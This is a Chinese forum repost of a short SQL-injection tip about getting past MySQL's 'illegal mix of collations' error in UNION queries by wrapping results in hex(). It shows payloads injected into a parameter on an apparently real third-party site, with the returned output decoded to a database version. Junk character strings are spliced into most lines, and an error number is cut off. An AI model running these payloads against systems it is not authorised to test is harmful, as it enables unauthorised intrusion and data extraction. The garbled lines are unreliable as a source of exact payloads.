找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2107|回复: 0
打印 上一主题 下一主题

MySQL注射时ErrorNo.1267的突破

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-15 14:04:54 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
本文作者:SuperHei2 \) i& k1 ]; _0 `
文章性质:原创
% J  [2 M: I, c4 H; Q; }% v* C  y发布日期:2005-10-187 j& H9 P9 S' W, Y3 q
测试个国外的站时:8 _8 V( U1 c# F; J* t7 j0 _4 A
url:?c_id=2%20and%201=2%20union%20select%201,version(),3,4,5,6%20/*
! ~9 Y$ h# l3 o  `" X7 c6 [6 ~返回错误:
+ [5 o6 J9 ^+ MIllegal mix of collations (euckr_korean_ci,IMPLICIT) and (utf8_general_ci,IMPLICIT) for operation 'UNION'
/ [. P3 Z+ y6 V8 R/ x& YMySQL Error No. 126, q% s0 _$ C* ]$ o
看来是union查询前后字符集(http://dev.mysql.com/doc/mysql/en/Charset-collation-charset.html)不同出现的。; {0 N6 E# R' D+ v3 W+ @
解决办法:转为其他编码如hex。
& u. t" }; g9 F* d" ~6 x( Uurl:?c_id=2%20and%201=2%20union%20select%201,hex(version()),3,4,5,6%20/*) @2 ^6 Q$ X7 ~& }
成功得到hex(version())的值为:6 k9 o  O: A, I# |: p7 C2 F
342E312E332D62657461) s( @' o5 }, @
回Mysql查询下得到:( \) n+ C. |1 ^( e. H
mysql> select 0x342E312E332D62657461;
% A; K2 P+ N2 X& D1 u7 C4 I+------------------------+3 ^9 J- ~. `( x1 i% M8 J# C6 H% _
| 0x342E312E332D62657461 |) b% x; X" ?$ n" Y
+------------------------+
) a  ]( ~- D3 O# m# d| 4.1.3-beta |
7 }. [$ s% }3 i/ i: j+------------------------+
  x9 E/ W1 v6 v* A1 row in set (0.00 sec)/ q1 Z# v1 J- S' C8 \& P# P
1 P% y! R) w( \  a) p, u
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表